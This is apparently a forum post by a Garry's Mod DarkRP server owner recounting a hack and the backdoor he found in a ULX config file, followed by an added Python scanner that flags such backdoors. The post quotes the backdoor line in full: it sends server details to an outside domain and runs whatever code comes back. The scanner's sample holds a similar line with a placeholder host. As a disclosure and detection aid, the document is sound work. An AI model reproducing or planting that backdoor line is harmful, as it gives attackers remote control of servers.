Server hackers??? Oh great, just another clickbaity thread about a 12-year-old kid complaining about scripters.
Well, not exactly.
This is a story time, so get settled in.
A little bit about me: I'm currently an independent developer/owner of a Garry's Mod DarkRP server with moderate coding knowledge, really enough to get me by. Been working on this server for the past month, and this is the first time (and hopefully last time) this happens to me.
It's just an average day on the server, everything's quiet, but then we receive an unexpected spike in players. Mostly minges because of being a new server, but nonetheless, still players. This seemed quite promising because it had been empty the past week. Everyone's just doing their own things, and I feel like it's break time since I had been working non-stop for a couple of hours, so I get up to go eat some food. I'm standing there in my kitchen, enjoying my food, when my friend who was playing on my server turns to me with a worried look on his face and says "We're getting hacked."
Oh, what?! No way, this can't happen. I had a feeling... Thoughts started racing through my head, and so I finished up quickly and went to my computer. There on my screen is an image of graphic pornographic material flashing on my screen. Everyone was complaining about it on the server, so I was quite concerned.
My Garry's Mod runs in fullscreen, so it definitely couldn't be another application causing this. I've heard about this one other time and I thought it wasn't real. Oh boy, was I wrong! Since the pornographic image was flashing constantly, I decide it's investigation time.
While on the server, I search through my console, the server's chat history, and all the players to find the troublesome players. Turns out, a few individuals were involved. I found who I thought to be the main troublemaker, named "in0xia", along with a possibly malicious URL, mostly because my friend had ULX banned him multiple times but he never actually got kicked, so I decided to start taking action. I went straight to an addon that allows me to grab users' IP addresses, and ULX IPBanned (through a ULX addon) the player, and he finally disconnected. I also attempted banning a player called 'b a n k s y', but even when the server echoed that he was ULX banned, he was still right in front of my face. in0xia was instantly able to rejoin the server, so since the ban wasn't working, I started crashing both of their clients every time they attempted to join the server. Before any more destruction could be caused, I pulled the plug on the server.
I frantically started searching through all my files looking for possible backdoors, and one of the first file paths I searched through was ULX. I found not a backdoor, not a command, but ~35,000 lines of code! Under data/ulx/config.txt, I found some code that forced ULX to include a function that fetches the server's IP address, hostport, and name and sends it off to a server.
ulx luarun "function a() http.Fetch('https://xn--vxao.pw/tracker.php?port='..GetConVar('hostport'):GetString()..'&ip='..game:GetIPAddress()..'&addon='..GetHostName():Replace(' ', '%20'),function(body)RunString(body, 'lua/init.lua') end) _G.a = nil end"
There was also code before and after the above code that disabled ulx logecho before the function was executed and re-enabled ulx logecho after the function was finished.
I went to the website inside the http.Fetch and it returns with 'This is for servers only...'
https://xn--vxao.pw/tracker.php?port=
No luck.
So I decided to head to just the domain itself, and it linked to:
https://xn--vxao.pw/
JACKPOT!! That website included multiple pieces of contact information, including their Twitter, Discord, and Steam! I decided to head straight to the Steam profile, and what do you know, it's one of the players causing the trouble on my server!
I still haven't pinpointed where it makes the pornographic images flash on the screen, but I figured letting you all know that this isn't an 'urban legend of gmod' or whatever would be useful. I'd highly advise that you ban their SteamIDs before they even get on your server, because then you too might have porn spammed on all your users' screens and possibly have worse happen to you.
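
An added example, not part of the original post: a small Python audit for a ULX config file such as data/ulx/config.txt that flags the pattern described above (a `ulx luarun` line that fetches remote code and passes it to RunString, with log echo switched off around it). The rule names, the `ulx logecho 0` syntax and the sample config with its placeholder host are assumptions constructed for illustration.

```python
import re
import sys

# Heuristic rules for Lua-execution backdoors in a ULX config file.
# Assumption: log echo is disabled with "ulx logecho 0"; the post only
# says it was turned off before the payload and back on afterwards.
RULES = {
    "luarun": re.compile(r"\bulx\s+luarun\b", re.I),
    "remote_fetch": re.compile(r"\bhttp\.(Fetch|Post)\s*\(", re.I),
    "dynamic_exec": re.compile(r"\b(RunString|CompileString)\s*\(", re.I),
    "logecho_off": re.compile(r"\bulx\s+logecho\s+0\b", re.I),
    "punycode_host": re.compile(r"https?://[^/'\"\s]*xn--", re.I),
}

def severity(hits):
    """Rank a line by which rules fired on it."""
    if {"remote_fetch", "dynamic_exec"} <= hits:
        return "critical"  # downloads a response body and executes it
    if hits & {"luarun", "dynamic_exec"}:
        return "high"      # runs Lua from a config file
    return "review"        # suspicious on its own, needs a human look

def scan_config(text):
    """Return [(line_number, sorted_rule_names, severity), ...]."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        hits = {name for name, rx in RULES.items() if rx.search(line)}
        if hits:
            findings.append((n, sorted(hits), severity(hits)))
    return findings

# Constructed sample config; the host is a placeholder, not a real indicator.
SAMPLE = """\
ulx showMotd 1
ulx logEcho 1 ; Echo mode 0 - Off, 1 - Anonymous, 2 - Full
ulx logecho 0
ulx luarun "function a() http.Fetch('https://xn--placeholder.invalid/t.php?ip='..game.GetIPAddress(),function(body) RunString(body, 'x') end) end"
ulx logecho 1
"""

if __name__ == "__main__":
    # Pass a config path as the first argument, or scan the sample.
    if len(sys.argv) > 1:
        with open(sys.argv[1], errors="replace") as fh:
            text = fh.read()
    else:
        text = SAMPLE
    for n, rules, sev in scan_config(text):
        print(f"line {n}: {sev}: {', '.join(rules)}")
```

Any "critical" or "high" line in a config file you did not write yourself is worth treating as a compromise, and a config file that has grown to tens of thousands of lines deserves the same scan across every file under data/.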